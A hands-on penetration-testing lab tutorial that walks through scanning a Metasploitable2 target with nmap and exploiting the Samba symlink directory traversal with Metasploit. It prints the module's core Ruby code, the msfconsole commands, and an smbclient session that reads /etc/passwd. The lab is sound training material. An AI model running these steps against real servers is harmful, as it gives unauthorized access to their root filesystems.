Exploiting Samba Vulnerability on Linux Server

CybersecurityCybersecurityBeginner
Practice Now

Introduction

In this lab, you will learn how to exploit a new Samba vulnerability on the Metasploitable2 target machine. Throughout the process, you will be provided with screenshots for each step. By completing this lab, you will gain hands-on experience in using tools to exploit the Samba vulnerability.

This course is a purely hands-on experimental tutorial. To help you understand the operations in the experiment, some information security theory will be introduced, and the most valuable articles will be recommended for you to read while practicing.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_save_output("`Nmap Save Output to File`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_host_discovery("`Nmap Host Discovery Techniques`") subgraph Lab Skills cybersecurity/nmap_save_output -.-> lab-416125{{"`Exploiting Samba Vulnerability on Linux Server`"}} cybersecurity/nmap_host_discovery -.-> lab-416125{{"`Exploiting Samba Vulnerability on Linux Server`"}} end

Start the Experiment Environment

In this step, you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Scan the Target Host for Vulnerabilities

In this step, you will use Nmap to scan the target host for vulnerabilities.

First, log into the MSF terminal in the LabEx Kali environment:

cd ~
service postgresql start
msfdb init
msfconsole

Collecting information about the target host is the first step in penetration testing. Use Nmap to scan the target host for vulnerabilities and save the scan results to the file /tmp/report.txt by entering the following command:

nmap -p 1-1000 -T4 -A -v 192.168.122.102 >/tmp/report.txt

The parameters used here have the following meanings:

Parameter Description
-p Specifies the port range to scan
-T4 Sets the timing policy for Nmap scanning, with values from 0-5 (higher is faster)
-A Enables operating system detection and version detection
-v Displays detailed information during the scanning process
>/tmp/report.txt Redirects the output to a file for later analysis

This process may take a while because a large range of ports is being scanned for comprehensive information gathering. Please be patient and wait for one to two minutes.

After the scan is complete, press Ctrl+D use the cat command to view the file contents in the LabEx Kali terminal:

cat /tmp/report.txt

You should see information similar to the following in the text:

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

This indicates that ports 139 and 445 are running the Samba service.

Analyze the Samba Vulnerability

In this step, you will learn about the Samba vulnerability and analyze the core code of the exploit module.

Samba is free software that allows UNIX-like operating systems to connect with the SMB/CIFS (Server Message Block/Common Internet File System) network protocol used by Microsoft Windows. Version 3 not only allows access and sharing of SMB folders and printers but can also integrate into a Windows Server domain as a Domain Controller or join an Active Directory as a member. In simpler terms, this software bridges the gap between Windows and UNIX-like operating systems, enabling resource sharing between the two.

Samba has a wide range of applications, and therefore, vulnerabilities in Samba can have a significant impact. Samba can create network shares for selected Unix directories (including all subdirectories). This feature allows Windows users to access these Unix directories over the network, just like accessing regular Windows folders.

The vulnerability index used in this experiment is:

OSVDB-62145

The source code index for the samba module used in this experiment is:

symlink_traversal.rb

Let's go through the core code explanation:

  ## Module initialization information, including author information and module introduction
  def initialize
    super(
      'Name'        => 'Samba Symlink Directory Traversal',
      'Description' => %Q{
        This module exploits a directory traversal flaw in the Samba
      CIFS server. To exploit this flaw, a writeable share must be specified.
      The newly created directory will link to the root filesystem.
      },
      'Author'      =>
        [
          'kcope', ## http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
          'hdm'    ## metasploit module
        ],
      'References'  =>
        [
          ['OSVDB', '62145'],
          ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
        ],
      'License'     => MSF_LICENSE
    )

    ## Register option information
    register_options([
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
    ], self.class)

  end


  ## Main execution function
  def run

    ## Function to connect to the server
    print_status("Connecting to the server...")
    connect()
    smb_login()

    ## Connect to the target host
    print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")
    self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")

    ## Attempt to enter the root filesystem
    print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
    self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10)

    ## Print success message after successful entry
    print_status("Now access the following share to browse the root filesystem:")
    print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
    print_line("")
  end

end

After explaining the core code of the module, let's perform the actual exploitation in the MSF terminal by entering the following commands:

search samba
use auxiliary/admin/smb/samba_symlink_traversal
show options

Set the target host:

set RHOST 192.168.122.102

Select the shared directory:

set SMBSHARE tmp

Note: As a reminder, the impact of this Samba vulnerability is that it allows the creation of network shares for selected Unix directories (including all subdirectories).

After setting all the required parameters, you can proceed with exploiting the vulnerability:

exploit

If successful, you should see the following message:

[*] 192.168.122.102:445 - Now access the following share to browse the root filesystem:

After successful exploitation, exit with the exit command, and test if you can connect using smbclient in the terminal. You will be prompted for a password, but you can press Enter without entering any password:

exit
smbclient //192.168.122.102/tmp

Once connected, you can verify access to the root filesystem by executing the following command:

more rootfs/etc/passwd

You should see output similar to:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
[....]

This confirms that you have successfully exploited the vulnerability and gained access to the target host through the created network share.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned about the Samba vulnerability in Metasploitable2 and were guided through the process of exploiting this vulnerability on the target machine using the original steps. You then used the created network share to log into the compromised target host. The key points covered in this lab include:

  • Linux basic commands
  • Nmap vulnerability scanning
  • Analysis of the scanned Samba vulnerability
  • Core code explanation of the symlink_traversal module
  • Logging into the target host using the network file share

It is recommended that you practice these steps repeatedly to strengthen your understanding of the penetration testing process. The recommended reading section provides additional resources for you to deepen your knowledge of Samba vulnerabilities.

Other Cybersecurity Tutorials you may like